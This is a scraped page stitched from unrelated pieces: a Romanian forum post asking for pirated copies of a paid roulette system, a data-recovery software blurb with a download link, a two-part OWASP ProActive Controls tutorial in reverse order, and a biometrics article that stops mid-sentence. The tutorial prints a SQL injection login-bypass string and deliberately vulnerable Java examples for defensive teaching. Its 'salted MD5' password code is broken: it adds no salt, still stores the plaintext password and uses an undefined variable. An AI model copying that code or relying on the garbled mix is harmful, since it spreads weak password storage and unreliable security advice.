Search the Community

Observati ca totul se bazeaza pe o anumita "zona" de numere care este variabila, uitati-va unde marcheaza segemntul respectiv cu cele doua monezi si veti vedea ca nu e acelasi de fiecare data insa le nimereste de fiecare data: https://www.youtube.com/watch?v=c-_niuZOZhc Iar aici aplica metoda live (mai da si uneori rateuri dar doar de 2 sau 3 ori din cat de multe a incercat): Iar aici e situl respectiv: Advanced semi automatic Visual Roulette System | Roulette System | how to beat roulette Ce parere aveti ? O fi real sau fake ? M-am tot uitat o perioada la diverse sisteme de jucat la ruleta pe youtube si le-am testat aici pe play money: https://satoshibet.com/roulette si nici unul (nici macar unul din ele) nu a dat rezultate. Are cineva materialele de pe mastersroulette si e binevoitor sa faca un share ? De pe torrente private ma refer ca nu cred ca a dat cineva 167 de lire pentru un sistem care se poate sa fie o aiureala 100%. Multumesc anticipat !

Product Description The newly-upgraded Power Data Recovery 6.8 is added with support for dozens of RAW file types including *.m4v, *.3g2, *.wtv, *.wrf, *.pps, *.dps and 4096-byte-sector-based hard drive. Unlike other data recovery software, MiniTool Power Data Recovery is an all in one data recovery software for home and business users. It can recover deleted data from the Windows Recycle Bin, restore lost data, even if the partition is formatted or deleted, restore data from a corrupted hard drive, virus infection, unexpected system shutdown or software failure. It supports IDE, SATA, SCSI, USB hard disk, memory card, USB flash drive, CD/DVD, Blue-Ray Disk and iPod. MiniTool Power Data Recovery contains five data recovery modules – Undelete Recovery, Damaged Partition Recovery, Lost Partition Recovery, Digital Media Recovery and CD & DVD Recovery. Each data recovery module focuses on a different data loss scenario. The Undelete Recovery module focuses on recovering deleted files and folders. By using Undelete Recovery module, you could recover deleted files emptied from the Windows Recycle Bin and even files deleted by using SHIFT+DELETE key. Undelete Recovery module supports FAT12, FAT16, FAT32, VFAT, NTFS and NTFS file systems. It also supports hard disks, flash drives, memory sticks, memory cards and flash cards. To recover deleted files from CD/DVD disks, please use the CD/DVD Recovery module. The Damaged Partition Recovery module is the most powerful data recovery module of MiniTool Power Data Recovery. This data recovery module focuses on recovering data from damaged or formatted partitions. For example: If a drive is displayed as RAW and Windows asks – “Do you want to format this drive?”. This problem can be solved by using this data recovery module quickly. In other words, as long as the partition is existing, the user can use this data recovery module to recover data from the partition irrespective of whatever happened to cause the data loss. And this data recovery module not only supports MBR-style partition, but also supports Windows Dynamic disk volume. For example: Simple Volume, Spanned Volume, Striped Volume and RAID-5 Volume. If you cannot find the partition you want to recover in this data recovery module, you will need to use Lost Partition Recovery module. The Lost Partition Recovery module is designed to recover data after partition loss or deletion. The user may accidentally delete an important partition when using partition management software (for example: Partition Wizard). It could also happen when the user reinstalls Windows to a hard drive. In other words, if you cannot not find your partition in the Damaged Partition Recovery module, you should use this data recovery module to get your data back. The Digital Media Recovery module is designed to recover data from digital media in the event of any problems occurring. This module supports most digital media devices, for example: Flash drives, flash cards, memory cards, memory sticks and iPods. This data recovery module focuses on recovering lost/deleted photos, music (mp3 files, mp4 files) and video files. The Digital Media Recovery module also supports the recovery of digital camera RAW files. Some of the manufacturers have defined the photo file’s format by themselves. For example: Canon supports CRW and CR2 photo format. Kodak supports DCR photo format. Minolta supports MRW photo format. Nikon supports NEF photo format. Olympus supports ORF photo format. Pentax supports PEF photo format. Fuji supports RAF photo format. And Sony supports SRF photo format. The CD/DVD Recovery module is designed to recover data from CD & DVD disks. It is designed specifically to recover lost and deleted files from damaged, scratched or defective CD and DVD disks. This data recovery module can recover files recorded by common CD/DVD writing software. It is capable of recovering data from all CD and DVD disc types (CD-ROM, CD-R, CD-RW, DVD-ROM, DVD-R, and DVD-RW), and from quick formatted RW discs. It also supports a disc recorded with UDF packet writing software: DirectCD, InCD, packetCD. -> Download <-Deal Expire in: EXPIRED!

In the first part of this series, we covered the Top 5 OWASP ProActive Controls and learned how they can prove to be of great use in securing applications. In this part, we will look at the last 5 OWASP ProActive Controls and learn more about them. Protect Data and Privacy It helps to protect our data inside a database. Sensitive data like passwords, credit card details and bank account details etc. should be stored in encrypted or hashed format inside a database or chosen data storage. One should not use encryption and hashing interchangeably, as encryption and hashing are entirely different from each other. Encryption is used to convert readable text or plain text into unreadable text or cipher text. Encryption is a two way data conversion technique, meaning data which is encrypted can also be decrypted (if you have the decryption key). Encryption can be done in two main ways: Symmetric method Asymmetric method Symmetric encryption or Secret Key Cryptography (SKC) uses a secret key for encryption and decryption. It means the receiver uses same key that was used for encryption to decrypt. Asymmetric method or Public Key Cryptography (PKC) uses two sets of keys to perform encryption and decryption. One is a public key and another is a private key. Public Key is used for data encryption and Private Key is used for data decryption. Depending upon your application requirement, developers can choose between the two encryption methods. Hashing is different from encryption; unlike encryption, it is a one way process. It means data that’s converted into hashed format can never be converted into plain text. An application cannot choose hashing or encryption just like that. A ecure storage technique is chosen depending upon the data that has to be stored securely. At some time in the future, if the sensitive data is to be shown to the user in plaintext, then encryption is the best option (plaintext <->ciphertext). If the sensitive data is to be stored for some validation or authentication or verification, then hashing should be stored (Plaintext -> Hash). For example: Sensitive information between the client and server should also be in encrypted form. Hyper Text Transfer Protocol Secure (HTTPS) should be used instead of Hyper Text Transfer Protocol (HTTP) whenever any sensitive information is to be transmitted. When HTTPS is used, client server communication is encrypted using supported technology like SSLv2, SSLv3, TLS1.0, and TLS1.2. It is especially used to protect highly confidential data like online banking. The port number for HTTP is 80 and for HTTPS is 443. Implement Logging and intrusion Detection In an application, most requests are received using GET, POST, PUT, and DELETE methods. A request sent can be either a malicious request or a clean request. Malicious requests are those requests which contain attack vectors like SQL Injection, XSS, Unauthorized Data Access, etc. When there is public user activity or Intranet employee access, then the application should always keep track of all the activities taking place. Logging is very important in every application and one of the areas which is most neglected during development and deployment. Logging means storing log data about every request that is sent and received, such time, IP address, requested page, GET data, and POST data of a request. If a user is authenticated, then who is the user, when he logged in, when he logged out, etc. Since all user activity is being logged, it should also be noted that user sensitive data like password and financial details should NEVER be logged. Intrusion Detection means a malicious request with an attack vector has been detected and received by the application or not. If such a request has been received, then suitable actions like logging and request drop should be performed. For example, if a SQL Injection vulnerability exists on a login page, the application should have a feature to detect when SQL Injection is performed and should log time and from which IP address the attack originated, and then perform a suitable action on it. ModSecurity and OWASP ModSecurity Core Rule Set Project can prove to be of great use when you want to detect and/or prevent any malicious activity. Logging and intrusion detection is necessary to keep a record of every activity that takes place on an application. Intrusion detection is implemented along with logging to keep a check on when an attack or malicious data is received, so that it can be handled properly. Leverage Security Features of Frameworks and Security Libraries When developers start developing any application, either they don’t implement secure coding practices or use third party libraries for implementing security features. But most programming languages or development framework have built-in security functions and libraries which can be leveraged to implement security features in applications. Developers should use those built-in features instead of third party libraries. Recall OWASP Top 10 Vulnerabilities “A-9 Using Components with Known Vulnerabilities”. If third party components or libraries are used and any vulnerability is discovered in those components, then our application will automatically become vulnerable. It is recommended that developers should use security features provided by the programming language like escapeHtml() of httputils provided by Apache Commons Lang in Java and htmlentities() in PHP, which can be used to mitigate Cross-Site Scripting (XSS) vulnerability. But it is a known fact that industry tested security features are not readily available in programming languages. In such a case where useful and required security features or libraries are not available in the programming language you are using, then industry trusted and tested security libraries should be used. One of the well-known OWASP projects for this purpose is the OWASP ESAPI Project, which helps developers to implement security controls in their applications. For example: In Java we have security functions like escapeHtml() which can be used to mitigate XSS. String name = StringEscapeUtils.escapeHtml(request.getParameter(“name”)); PreparedStatement is used to mitigate SQL Injection. PreparedStatement ps=(PreparedStatement) con.prepareStatement(“select * from users where username=? and password=? limit 0,1?); Using built-in security features ensures that you don’t have to use unnecessary libraries you are not confident in or have security tested. Include Security-Specific Requirements When a software or web application development is to be started, then software requirements are laid out, which takes place in the early stage of an SDLC. As software requirements are mentioned initially in any project, security requirements should also be mentioned. Security requirements, if being made part of an SDLC, can help in implementing security inside the application and also identifying the key areas which can be exploited. According to OWASP Proactive Controls, three security requirements are important: Security features and functions; Business logic abuse cases; And data classification and privacy requirements. Security features and function\ All security details, such as application features, modules, database details, modules functioning and security implementation in modules should be mentioned in an application. It should be defined that all secure coding practices in any application should be implemented at the time of development. Business logic abuse cases When any application is designed, there is a way to access data and to perform operations. For example, when a user is performing an online banking transaction, some details are required within a well-defined process: Login to bank account. Choose your account to transfer from. Choose amount and destination account to transfer to. Enter profile password. Enter OTP password received on registered phone number. Confirm transaction. Wait for success message. All these steps define a data flow diagram or business logic. Now these details can have some weaknesses, which can make them vulnerable. When the business logic has been listed, key areas of weakness can be identified, and areas where security can be beefed up can be identified too. For example: User should not be able to choose someone else’s bank account as source account of transfer. User should not be able to bypass profile password requirement. OTP should be valid only once and for that account only. Data classification and privacy requirement Data classification and requirement should be decided at the time of development. When any application interacts with the user, then user data is received and stored. The answers to these questions should be decided in advance: Which data is to be accepted from the user? Is that data sensitive or not? Is that data to be stored? If data is sensitive, then should the application decide if it will be stored in encrypted or hashed format? If bank details are stored, then those details should be verified and validated by the application. Data authorization should also be decided at an initial stage, like who can access, delete and modify data. Since the application will be dealing with users and operations on user data. It is critical to maintain logs for all activities. Logging of activity was discussed above in the “Implement Logging and Intrusion Detection” section. Security Design and Architecture In the last one to nine OWASP ProActive Controls, we saw how to implement security in our code, which areas to secure, how to secure and what components can be used to help you implement better security in your application. In the last ProActive Control, we discuss the other areas of application security which can prove to be of great use and should not be neglected. OWASP has defined three key areas to take care of when developing any application: Know Your Tools Tiering, Trust and Dependencies Manage the Attack Surface Know Your Tools Every application is built using some server side language, client side language, database or no database, etc. Each component used could be the source of opening a security vulnerability in your application and server. For example, using an outdated version of Struts Framework can lead to a user exploiting remote code execution on it, or an older version of PHP leading to the same consequence. Similar is the case for databases and every other component which is used to build an application. So before starting any application development, it should be made clear what components can or may lead to a vulnerable application in the present or near future. Tiering, Trust and Dependencies Each layer of the whole application is called a tier. With each tier there is an associated level of risk and vulnerabilities that can crop in. For every tier — be it client side, server side, database, or anything — the risk associated with it should be calculated, and necessary mitigations should be implemented. When an application is interacting with user input and user data, trust is the only factor which decides which operation should be performed, when to perform, and on what to perform. An authentication page not implemented properly will have a poor trust level and will allow malicious users to access others’ data. In the worst case, it will result in a user transferring funds or accessing confidential company data without proper authorization. Application development involves using several components all together and making sure that each component will work with others. This is the case of dependency, where X component depends upon Y component for its proper functioning. It is very common to use older components to maintain reliability and proper functioning. But each dependency should be thoroughly checked, or else it can create an unwanted weakness inside the application. Manage Attack Surface The attack surface is the whole combined application including software, hardware, logic, client controls, server controls. Everything from physical, digital, to logical makes the attack surface. Any part of a setup if and when found to be vulnerable can act as an open entry gate for a malicious user to perform an action. Developers are usually not concerned about the web server software version the application will be deployed on. But older web server software like Apache or Struts can lead to an attacker successfully exploiting it and managing his/her way into the application and user data. Conclusion From OWASP ProActive Controls we learned how an application can be secured and how to identify the key areas of every application that can all together help in strengthening our application and stored data. OWASP ProActive Controls are a good place to start training developers to implement secure coding practices and beef up the security of key areas of an application like authentication, authorization, user data access and storage. But ProActive Controls should not be looked upon as the only set of controls for application security. It is a good place to start developing skills and knowledge leading to continuous learning and habitual secure coding practices. Reference https://www.owasp.org/index.php/OWASP_Proactive_Controls Source

What is OWASP ProActive Controls? In one line, this project can be explained as “Secure Coding Practices by Developers for Developers“. OWASP ProActive Controls is a document prepared for developers who are developing or are new to developing software/application with secure software development. This OWASP project lists 10 controls that can help a developer implement secure coding and better security inside the application while it is being developed. Following these secure application development controls ensures that the key areas of the development cycle have secure coding along with traditional coding practices. The strength of this project is not just in the listed 10 controls but in the key references associated with it. Every control extends the knowledge and capabilities by mentioning existing OWASP or other open source projects that can be used to strengthen the security of an application. The ten controls defined by this project are: Parameterize Queries Encode Data Validate All Inputs Implement Appropriate Access Controls Establish Identity and Access Controls Protect Data and Privacy Implement Logging, Error Handling and Intrusion Detection Leverage Security Features of Frameworks and Security Libraries Include Security-Specific Requirements Design and Architect Security In Let us go deeper into each ProActive Control and see what it takes for us to implement it in the real world. PARAMETERIZE QUERIES One of the most dangerous attacks on a Web application and its backend data storage is SQL injection. It occurs when a user sends malicious data to an interpreter as an SQL query, which then manipulates the backend SQL statement. It is easy for an attacker to find a SQLi vulnerability using automated tools like SQLMap or by manual testing. The simplest and most popular attack vector used is: 1? or ‘1’= ‘1 Submitting it as a username and password or in any other field can lead to an authentication bypass in many cases. Here is an example of typical SQL injection in a user authentication module: String username= request.getParameter(“username”); String password= request.getParameter(“password”); Class.forName("com.mysql.jdbc.Driver"); Connection con = (Connection) DriverManager.getConnection("jdbc:mysql://database-server:3306/securitydb:", "root" ,"root"); Statement st= con.createStatement(); ResultSet rs=st.executeQuery("select * from users where username='"+username+"' and password='"+password+"' limit 0,1"); In this vulnerable code, the ‘Statement’ class is used to create a SQL statement, and at the same time it is modified by directly adding user input to it, then it is executed to fetch results from the database. Performing a simple SQLi attack in the username field will manipulate the SQL query, and an authentication bypass can take place. To stop a SQLi vulnerability, developers must prevent untrusted input from being interpreted as a part of a SQL query. It will lead to an attacker not being able to manipulate the SQL logic implemented on the server side. OWASP ProActive Controls recommends that developers should use parameterized queries only in combination with input validation when dealing with database operations. Here is an example of SQL query parameterization: String username=request.getParameter(“username”); String password=request.getParameter(“password”); Class.forName(“com.mysql.jdbc.Driver”); Connection con=( Connection) DriverManager.getConnection("jdbc:mysql://database-server:3306/securitydb:", "root" ,"root"); PreparedStatement ps=(PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1"); ps.setString(1,username); ps.setString(2,password); ResultSet rs=ps.executeQuery(); if(rs.next()) out.println("Login success"); else out.println("Login failed"); Using a parameterized query makes sure that the SQL logic is defined first and locked. Then the user input is added to it where it is needed, but treated as a particular data type string, integer, etc. as whole. In a database operation with a parameterized query in the backend, an attacker has no way to manipulate the SQL logic, leading to no SQL injection and database compromise. SQL injection vulnerability has been found and exploited in applications of very popular vendors like Yahoo! too. ENCODE DATA Data encoding helps to protect a user from different types of attacks like injection and XSS. Cross Site Scripting (XSS) is the most popular and common vulnerability in Web applications of smallest to biggest vendors with a Web presence or in their products. Web applications take user input and use it for further processing and storing in the database when ever needed. Also user input could be part of the HTTP response sent back to the user. Developers should always treat user input data as untrusted data. If user input at any point of time will be part of the response to user, then it should be encoded. If proper output encoding has been implemented, then even if malicious input was sent, it will not be executed and will be shown as plain text on the client side. It will help to solve a major web application vulnerability like XSS. Here is an example of XSS vulnerability: if(request.getMethod().equalsIgnoreCase("post")) { String name = request.getParameter("name"); if(!name.isEmpty()) { out.println("<br>Hi "+name+". How are you?"); } } In the above code, user input is not filtered and used, as it is part of message to be displayed to the user without implementing any sort of output encoding. Most common XSS vulnerabilities that affect users and are found in applications are of two types: Stored XSS Reflected XSS Stored XSS are those XSS which get stored on a sever like in a SQL database. Some part of the application fetches that information from the database and sends it to the user without properly encoding it. It then leads to malicious code being executed by the browser on the client side. Stored XSS can be carried out in public forums to conduct mass user exploitation. In Reflected XSS, the XSS script does not get stored on the server but can be executed by the browser. These attacks are delivered to victims via common communication mediums like e-mail or some other public website. By converting input data into its encoded form, this problem can be solved, and client side code execution can be prevented. Here is an example of output encoding of user input: if(request.getMethod().equalsIgnoreCase("post")) { String name = StringEscapeUtils.escapeHtml(request.getParameter("name")); if(!name.isEmpty()) { out.println("<br>Hi "+name+". How are you?"); } } In the next section you will see how input validation can secure an application. Combining input validation with data encoding can solve many problems of malicious input and safeguard the application and its users from attackers. OWASP has a project named OWASP ESAPI, which allows users to handle data in a secure manner using industry tested libraries and security functions. VALIDATE ALL INPUTS One of the most important ways to build a secure web application is to restrict what type of input a user is allowed to submit. This can be done by implementing input validation. Input validation means validating what type of input is acceptable and what is not. Input validation is important because it restricts the user to submit data in a particular format only, no other format is acceptable. This is beneficial to an application, because a valid input cannot contain malicious data and can be further processed easily. Important and common fields in a web application which require input validation are: First Name, Last Name, Phone Number, Email Address, City, Country and Gender. These fields have a particular format which has to be followed, especially email and phone number, which is very common. It is a known fact that first name and last name cannot have numbers in them; you cannot have a name as John39 *Bri@n. Such user input is treated as malicious and thus requires input validation. Input validation can be implemented on client side using JavaScript and on the server side using any server side language like Java, PHP etc. Implementing server side input validation is compulsory, whereas client side is optional but good to have. Now input validation is again of two types: Blacklist Whitelist The simplest example to explain the two can be: A security guard stops all guys wearing a red t-shirt who are trying to enter a mall, but anyone else can enter. This is a blacklist, because we are saying the red color is blocked. Whereas a whitelist says that guys wearing white, black and yellow t-shirt are allowed, and the rest all are denied entry. Similarly in programming, we define for a field what type of input and format it can have. Everything else is invalid. It is called whitelisting. Blacklisting is invalidating an input by looking for specific things only. For example, specifying that a phone number should be of 10 digits with only numbers is whitelist. Searching input for A-Z and then saying it is valid or not is blacklisting, because we are invalidating using alphabet characters only. Blacklisting has been proven to be weaker than whitelisting. In the above case, if a user enters 123456+890, then a blacklist will say it is valid because it does not contain A-Z. But it is wrong. Whereas a whitelist will say it contains a character that is not a number, and only numbers are allowed, so it is invalid. Input validation can be implemented in a web application using regular expressions. A regular expression is an object that describes a pattern of characters. These are used to perform pattern based matching on input data. Here is the example of a regular expression for first name: ^[a-zA-Z ]{3,30}$ This regular expression ensures that first name should include characters A-Z and a-z. The size of first name should be limited to 3-30 characters only. Let’s take another example of regular expression for username: ^[a-z0-9_]{3,16}$ Here this expression shows that username should include alphabets ‘a-z’, numbers ‘0-9? and special characters underscore ‘_’ only. The input length should be limited to 3-16 only. Email address validation can be performed using the following regular expression: ^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$ Depending upon the programming language a developer uses to build an application, regular expression can easily be implemented in it. Another advantage of regular expressions is that there are many industry tested regular expressions for all popular input types. So you don’t have to write one from scratch and then get it security tested. It is better to use industry tested regular expressions than writing one on your own (which in most cases will be flawed). OWASP has an Input Validation Cheat Sheet to help you implement proper input validation in your application. IMPLEMENT APPROPRIATE ACCESS CONTROLS Before we begin, it should be crystal clear that authentication is not same as authorization. Authentication takes care of your identity, whereas authorization makes sure that you have the authority or privilege to access a resource like data or some sensitive information. A simple real world example to show this can be: Alice visits Bob’s home. Her identity is known to Bob, so he allows her to enter her home (if she was not known to Bob then entry would have been denied, aka authentication failure). Alice is now inside Bob’s home. But she cannot open Bob’s family safe at home, because she is not authorized to do so. On the other hand, Bob’s sister Eve is known, so successful authentication occurs, and she is a family member, so she is authorized to access the family safe, aka successful authorization. Implementing authorization is one of the key components of application development. It has to be ensured at all times that access certain parts of the application should be accessible to users with certain privileges only. Authorization is the process of giving someone permission to do or have something. It is to be noted again that authentication is not equivalent to authorization. Many developers have a tough time handling authorization, and at some point leave a gap that gets exploited, leading to unauthorized data access. To solve this problem, access control or authorization checks should always be centralized. All user requests to access some page or database or any information should pass through the central access control check only. Access control checks should not be implemented at different locations in different application codes. If at any point in time you have to modify an access control check, then you will have to change it at multiple locations, which is not feasible for large applications. Access control should by default deny all requests which are from a user for a resource for which either access is restricted or an authorized entry has not been made. Layered Authorization Checks should be implemented. It means that the user’s request should be checked for authorization in layered manner instead of a haphazard manner. Below is an example: User requests “/protected” file access. Is user logged-in? Is user normal user or privileged user? Is user allowed access to the resource? Is resource marked as locked? f the access control check at any point in 1-5 fails, then the user will be denied access to the requested resource. OWASP Access Control Cheat Sheet can prove to be good resource for implementing access control in an application. ESTABLISH IDENTITY AND AUTHENTICATION CONTROLS Authentication is the process by which it is verified that someone is who they claim to be, or we can say it is the process of identifying individuals. Authentication is performed by entering username or password or any sensitive information. Authentication and identity are two components of accessing any kind of information that goes hand-in-hand. For example, if you want to access your bank account details or perform a transaction, you need to login into your bank account website. Successfully authenticating to your bank account proves that you are the owner of that account. From this discussion, it is clear that username and password are the elements of authentication that prove your identity. OWASP ProActive: Establish Identity and Authentication Controls says that all the modules of an application which are related to authentication and identity management should have proper security in place and secure all sensitive information. Also, an application should request for and store only the information which is absolutely needed, and nothing else. Sensitive information like password and account number should be either stored in encrypted or hashed format inside a database, so that it cannot be misused by a malicious user if he or she gains unauthorized access and decrypts it easily. Below is an example of an application that stores the user’s password in plaintext inside a MySQL database. String username=request.getParameter("username"); String password=request.getParameter("password"); PreparedStatement ps = (PreparedStatement) con.prepareStatement("insert into login_users values(?,?)"); ps.setString(1,username); ps.setString(2,password); Here the password is stored in plain text. If the database is compromised at the same time, the attacker will be able to access the user account easily. The attacker will be able to login to the user’s account using the username and password from the database, which is stored in plain text. But this vulnerability can be exploited by converting sensitive information into a hashed format, like in salted MD5 or SHA2 hash format or in encrypted form. Here is an example of hashing sensitive information before storing it in a SQL database: String username=request.getParameter("username"); String password=request.getParameter("password"); MessageDigest m = MessageDigest.getInstance("MD5"); m.update(s.getBytes(),0,s.length()); String calc_hash = new BigInteger(1,m.digest()).toString(16); if(calc_hash.length()<32) { calc_hash = "0"+calc_hash; } PreparedStatement ps = (PreparedStatement) con.prepareStatement("insert into login_users values(?,?,?)"); ps.setString(1,username); ps.setString(2,password); ps.setString(3,calc_hash); The above code shows that here sensitive information (i.e. password) is stored in a salted MD5 format. The salt is different for every new registration. If the database is compromised, then the attacker will have to find clear text for the hashed passwords, or else it will be of no use. Broken Session Management is also a type of vulnerability which exists in a web application that does not properly implement session management. For example, if a user logs out from his/her account, but he/she is redirected to some page, but session is not invalidated properly, a post-login page is opened without asking for re-authentication. Another example can be a session cookie for pre- and post-login being same. Vulnerable code: String username = request.getParameter("username"); String password = request.getParameter("password"); PreparedStatement ps=(PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1"); ps.setString(1,username); ps.setString(2,password); ResultSet rs=ps.executeQuery(); if(rs.next()) { session.setAttribute("useracc", rs.getString("username")); out.println("Login success"); } else { out.println("Login failed"); } Observe in the above code that the session cookie JSESSIONID remains the same for pre- and post-login. This vulnerability can be exploited by an attacker who has physical access to the machine and notes the value of session cookie pre-authentication. This attack is known as Session Fixation. This patched code will invalidate the session when authentication is successful and creates a new session cookie value. This changes the post-login session cookie value, and Session Fixation vulnerability cannot be exploited. String username=request.getParameter(“username”); String password=request.getParameter(“password”); PreparedStatement ps=(PreparedStatement) con.prepareStatement("select * from users where username=? and password=? limit 0,1"); ps.setString(1,username); ps.setString(2,password); ResultSet rs=ps.executeQuery(); if(rs.next()) { session.invalidate(); request.getSession(true); session.setAttribute("useracc", rs.getString("username")); out.println("Login success"); } else { out.println("Login failed"); } The session cookie value should never be predictable, and should comply with strong complexity for better security. Authentication and secure storage is not just limited to the username-password module of an application. Other key modules like forgot password and change password are also part of authentication. Financial data and personal information like SSN are some of the most important details a person is concerned with, so an application storing that data should make sure it is encrypted securely. OWASP has some key resources like: Authentication Cheat Sheet Session Management Cheat Sheet In this part of OWASP ProActive Controls, we discussed in depth how ProActive Controls 1-5 can be used in an application as a secure coding practice to safeguard it from well-known attacks. The controls discussed do not modify application development lifecycle, but ensure that application security is given the same priority as other tasks and can be carried out easily by developers. We will see the last 5 ProActive Controls in the next and final part. Reference: https://www.owasp.org/index.php/OWASP_Proactive_Controls Source

The options currently available for user authentication fall within three categories: authentication through something that the user knows, such as a PIN or a password; something the user has, such as a token with random codes, a flash drive or a proximity card; and something the user is identified by through the use of biometrics or something physically unique to the individual. Today’s system security professionals speak of passwords being too weak; this means that authentication, which for years has been the most widely used tool to protect data and systems, has been often proven too easy to break or too impractical to use when systems administrators enforce long, complex and unmemorable alphanumeric passwords. Tokens and other devices have also proved not always effective due to the cost of production and distribution and the possibility of being stolen and used fraudulently. So what are the alternatives? Biometrics, for one, can be used for password replacement. This is an ideal solution for identity-based authentication of computer users as it is for securing a computer facility. The article focuses on understanding why so many people and businesses depend on biometrics to provide the highest level of security, and it will address some of the new developments in biometric science that may just help boost its acceptance and offset some of its shortcomings, as well as address where the future lies for this type of technology. The uncertainty today is whether biometrics will play an important role in the future. Biometrics Exposed: How it Works for User Authentication Biometrics is the science and technology that analyze human body characteristics. It is based on measuring and analyzing biological and behavioral data. Biometric recognition simply draws on patterns and measurements (characteristics that are unique to individuals) for authentication. Many security experts agree that user authentication by means of linking a person to his/her body part(s) to establish an identity is a preferred method to enhance security. In many cases, in fact, biometric-based personal identification/verification technology even eliminates the need for usernames or passwords. As a logical control, biometric systems can provide entry into systems; as for physical security, they come handy to control access to secure areas. Biometric progression requires two stages: “enrollment and “authentication.” The first phase comprises of a capturing and an extraction stage. A user is enrolled by having biometric data collected through a device that records distinctive physical characteristics and/or behavioral traits. Video-optical images or thermal imaging scanning are examples of what can be used for this purpose. Data are extracted from the sample and a template is created. Data are then stored in a database where each template is linked to a person for future identity matching. The second part of the process is the authentication when data extracted are compared with the stored template so the individual can be identified or verified. This phase also is comprised of two stages: comparison (the template is compared to the sample) and the match/non-match decision. Fundamentally, the course of action is detection, recognition, verification, and then validation. Examples of biometric data that can be used for identification and authentication are fingerprints, facial recognition, iris scans and even vein scanning. These biometric traits are seen as especially “unique” identifiers for recognizing humans. Most biometric techniques are implemented using a sensor, which is used to scan, identify and authenticate someone to a system or entry point, only after having compared the extracted physical or behavioral feature-set against stored templates residing in a database. In general, biometric methods are exceptionally reliable for a positive identity match. A false-positive or false-negative is rare, although possible, depending on the accuracy of the biometric systems and sensor characteristics. Although the hardware needed to implement biometric verification can be quite expensive, this type of technology has proven worth the price. As with all electronic technologies, biometric devices can be fooled by impostors, but they are still becoming more commonly used at business locations and in work centers as trusted recognition systems that are sustainable in the long term to control access to high-security areas and, more importantly, to prevent identity theft. Types of Biometrics: Physical and Behavioral Traits There are two main types of biometric traits used for verification: physical traits, more commonly used so far, and behavioral, solely based on measurements and data derived from an action or series of actions performed by users. Physical biometrics uses “biological properties” that can uniquely determine an identity. Behavioral biometrics is based on “characteristic traits” exhibited by a person that can lead to his or her identification. Physiological biometrics includes face recognition technology and finger- and hand-scan in addition to the measurements and data derived from patterns of the iris or retinal scan that reads the blood vessels in the back of the eyes for identification. Physiological biometrics (in particular fingerprints and DNA) is already widely used in forensics for criminal identification. Fingerprints, for one, have been used for years to prove an individual’s identity electronically based on unique biological characteristics. The method has been used to distinguish one individual from another, as no two people have the same fingerprints. Fingerprint scanners can capture the user’s finger imprint to compare the person’s identity with a created unique biometric template. A person’s fingertip has come to be the most widely used biometric data. Behavioral biometrics includes voice-scans, signature-scans and keystroke-scans. The human voice was found to be a viable authentication thanks to the possibility of being recognized through unique voiceprints. Although effective, it is less secure than other behavioral traits like a keyboard-scan, for instance, that has no user interference. Signature and keystroke scans can help recognize individuals by analyzing the way they write or by patterns in keystroking. Privacy, Concerns and Security Issues The biometric authentication technique based on “something users are” is considered the most secure method over a PIN or passwords and smart card technology for physical and logical access control. Every so often, an uncovered password has led to a compromised system, while the use of cards has made information vulnerable when lost or stolen. Biometric traits are normally unique and permanent and hard to reproduce, especially in view of advances in technology, data communication security and biometric extraction devices. According to Biometrics.gov, the central source of information on biometrics-related activities of the U.S. federal government, “most biometric systems have a high accuracy (over 95 percent and many approach 100 percent) when matching biometrics against a large database of biometrics and when matching a biometric against the originally enrolled biometric.” The advantage of biometric security over more conventional systems is that it is easier to use for authentication situations, and yet it offers improved reliability and strengthened information delivery capabilities. Despite these advantages, there are, however, open issues involved with these systems, some technical and some privacy-related. Much of the skepticism that surrounds biometric technology has to do with the privacy concerns on storage, transmission and utilization of data that are perceived as extremely personal. Users are mostly concerned, especially now that the technology has been introduced in the mobile device world, about the safety of their unique identifiers and about the efficacy or lack of laws that govern use and misuse of personal bio data. Another source of concern is the increased use of biometrics in health service facilities and government, especially when mobile biometrics technology is used to verify identities anywhere on the go. The concern regards storage of data and their transmission to mobile devices. For the most part, the fact that information on people’s body features and behavior traits are recorded has been always a concern for many people worried about their privacy. Many see the storing of data and records as an infringement of privacy and personal rights. Biometric factors that are unique to a subject could lead to the development of tracking or monitoring of somebody’s movements from that point on. Some fear biometric data be accessed and misused. Users have expressed concerns over a number of biometric-related issues and possible forgeries. Authentication based on a signature-scan that analyzes handwritten text is often seen as simple to spoof, as forgeries are possible by a simple optical scanner or a camera. That may be why digitized electronic signature generation, even if considered legally binding on documents, is not widely used, and other behavioral biometric technologies are now used in its place. A fingerprint reader that is embedded on the laptop or keyboard or added through a USB port is a good alternative. However fingerprints could also be compromised, as fingerprints can be lifted from touched items by an imposter looking to gain fraudulent access to resources. Voice biometric systems unfortunately are sometimes prone to loud ambient sounds or low-quality inputs that tend to interfere with the ability to successfully record a usable sample. A voice biometric system could also be tampered with by someone able to record another’s voice, and play it back later to gain entry. Other difficulties come from input sensors being too sensitive, for example, to aging or facial expressions. These are all valid concerns related to the use of biometrics technology. It is true that biometric traits have been spoofed; however, they are definitely more secure than many other systems of authentication because they are natural, physically or behaviorally linked to a person. Reproducing them requires sophisticated techniques and advanced technology knowledge that is not required to spoof and crack other methods (as getting hold of a token or stealing passwords is a much simpler feat in comparison). In biometrics, what is stored is not an exact image of what has been scanned (the fingerprint, the retina, etc.) but a collection of binary numbers created when scanning; this extra passage is devised to prevent malicious hackers from reproducing exactly the image from which the numbers were extrapolated. Knowing humans are often the weakest link in the security chain, password-based security mechanisms (that can be cracked, reset, and socially engineered) might be substituted by biometrics that can be a natural, effortless, and much more accurate way to authenticate. The Future Biometrics is often seen today as an additional layer of protection to add to other, more traditional, authentication systems like passwords and PINs. Using a second (or even a third) authentication mechanism may provide a much higher level of security to verify the identity of a user. What the future might hold is a shift from multi-type secure authentication to simply using synergistic multiple biometric systems. Unimodal biometric systems are based on identification through only one trait. This is obviously not as accurate as we could wish and might not be adequate to all applications and uses. Also, if collection of that single data is affected in any way (for example by cream on hands that are fingerprint identified or by noise when collecting voice), accuracy would be limited. In addition, collecting only one type of data could exclude part of the users population when particular disabilities are present. The possibility of spoofing a single biometric data is higher than that of compromising more. This is why a multimodal biometric system that uses more than one trait for identification can be more reliable and resolve ambiguities and accuracy concerns. Advances in behavioral-based (dynamic) biometrics are also giving new life to this technology and are providing better and more accurate ways to authenticate users. Finger writing is a good example. This is a recognition verification system based on gesture movement, 